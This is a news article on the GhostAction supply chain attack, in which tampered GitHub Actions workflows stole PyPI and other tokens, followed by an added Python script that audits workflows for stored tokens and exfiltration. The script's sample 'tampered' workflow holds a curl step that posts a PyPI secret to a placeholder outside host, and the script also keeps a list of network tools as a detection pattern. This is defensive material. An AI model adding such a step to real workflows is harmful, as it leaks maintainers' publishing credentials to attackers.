PyPI Revokes Tokens Stolen in GhostAction Attack

The Python Software Foundation (PSF) has revoked all PyPI tokens stolen during the GhostAction supply chain attack earlier this month. Investigators stressed that the attackers did not use the stolen tokens to publish malicious packages.
How the Attack Unfolded
In early September, researchers at GitGuardian discovered that malicious GitHub Actions workflows injected into projects such as FastUUID were attempting to steal PyPI tokens by sending them to a remote server. GitGuardian reported the incident to the PyPI security team the same day, but the alert was mistakenly flagged as spam, delaying the response until September 10.

GitGuardian later assessed that more than 3,300 secrets had been stolen in the attack, including PyPI tokens, npm tokens, DockerHub credentials, GitHub tokens, Cloudflare API keys, AWS keys, and various database credentials. Once the full scope was understood, GitGuardian filed issues in over 570 affected GitHub repositories and alerted the security teams at GitHub, npm, and PyPI.
Community and Platform Response
Following the notifications, many project maintainers rotated their PyPI tokens, rolled back changes, or deleted compromised workflows.
Although the PyPI team found no evidence that its repository was compromised, administrators decided to revoke all affected tokens as a precaution. They also reached out to project owners to help secure accounts that may have been exposed.
Strengthening Defenses
PyPI administrator Mike Fiedler urged maintainers who use GitHub Actions to migrate from long-lived API tokens to Trusted Publishers, which issue short-lived tokens that are far less exposed to theft in supply chain attacks. He also recommended that developers log into their accounts and review their activity logs for suspicious behavior.
“It appears the attackers targeted a wide range of repositories—many of which contained PyPI tokens stored as GitHub Secrets—by modifying workflows to send tokens to external servers. While the attackers successfully exfiltrated some tokens, they do not appear to have used them on PyPI,” Fiedler wrote.
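As an added illustration (not code from PyPI, GitGuardian or the article), the following Python script applies the two points above to GitHub Actions workflow files: it flags long-lived PyPI tokens stored as GitHub Secrets, which Trusted Publishing would make unnecessary, and it flags steps that hand secret material to a shell command contacting a host outside an assumed allowlist, the workflow modification pattern the attack relied on. The two sample workflows, the allowlist, the secret names and the host exfil-placeholder.example are all constructed for this example.

```python
"""Heuristic audit of GitHub Actions workflows for long-lived PyPI tokens and
for steps that send secret material to an outside host.  Added example; the
regexes, allowlist and sample workflows are constructed, not taken from
GitGuardian's or PyPI's tooling."""
import re
from dataclasses import dataclass

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
ENV_BIND = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*):\s*\$\{\{\s*secrets\.")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
ID_TOKEN_WRITE = re.compile(r"^\s*id-token:\s*write\b")
PYPI_SECRET = re.compile(r"PYPI|TWINE", re.IGNORECASE)
NET_TOOLS = ("curl", "wget", "nc ", "Invoke-WebRequest", "urllib", "requests.")
# Hosts a publish workflow legitimately talks to (assumed allowlist; extend per project).
ALLOWED_HOSTS = {"upload.pypi.org", "pypi.org", "test.pypi.org", "github.com", "api.github.com"}


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str
    detail: str


def uses_trusted_publishing(text: str) -> bool:
    """True if some job requests an OIDC token (permissions: id-token: write),
    the prerequisite for PyPI Trusted Publishing instead of a stored token."""
    return any(ID_TOKEN_WRITE.search(line) for line in text.splitlines())


def audit_workflow(text: str) -> list[Finding]:
    findings: list[Finding] = []
    secret_envs: set[str] = set()  # env var names bound to ${{ secrets.* }}
    for lineno, line in enumerate(text.splitlines(), 1):
        refs = SECRET_REF.findall(line)
        bound = ENV_BIND.match(line)
        if bound:
            secret_envs.add(bound.group(1))
        # 1. A stored PyPI/Twine token is a long-lived credential: any step in a
        #    tampered workflow can read it and send it away.
        for name in refs:
            if PYPI_SECRET.search(name):
                findings.append(Finding(lineno, "long-lived-pypi-token",
                                        f"secrets.{name} referenced; prefer Trusted Publishing"))
        # 2. A secret (directly or through a bound env var) on the same shell
        #    line as a network tool and a non-allowlisted host is the pattern
        #    that moved tokens off the runners in this incident.
        uses_net_tool = any(tool in line for tool in NET_TOOLS)
        hosts = [h for h in URL_HOST.findall(line) if h not in ALLOWED_HOSTS]
        env_use = any(re.search(rf"\$\{{?{re.escape(n)}\b\}}?", line) for n in secret_envs)
        if uses_net_tool and hosts and (refs or env_use):
            findings.append(Finding(lineno, "secret-exfiltration",
                                    f"secret material sent to {', '.join(hosts)}"))
    return findings


# Constructed sample: a publish workflow that stores a long-lived token as a
# secret and has been modified to post it to an outside host before uploading.
TAMPERED_WORKFLOW = """\
name: publish
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: python -m build
      - name: Upload
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_API_TOKEN }}
        run: |
          curl -s -d "$TWINE_PASSWORD" https://exfil-placeholder.example/collect
          twine upload dist/*
"""

# Constructed sample: the same job using Trusted Publishing, so there is no
# stored token for a tampered step to read.
TRUSTED_WORKFLOW = """\
name: publish
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
    steps:
      - uses: actions/checkout@v4
      - run: python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
"""

if __name__ == "__main__":
    for label, wf in (("tampered", TAMPERED_WORKFLOW), ("trusted", TRUSTED_WORKFLOW)):
        print(f"{label}: trusted publishing={uses_trusted_publishing(wf)}")
        for f in audit_workflow(wf):
            print(f"  line {f.line}: {f.kind}: {f.detail}")
```

The checks are line-based on purpose: a full YAML parse would miss the common case where the harmful command sits inside a `run: |` block, and the pattern that matters (secret plus network tool plus unexpected host on one line) is cheap to scan for in CI or a pre-commit hook. On the tampered sample the script reports the stored token on line 12 and the outbound post on line 14; on the Trusted Publishing sample it reports nothing.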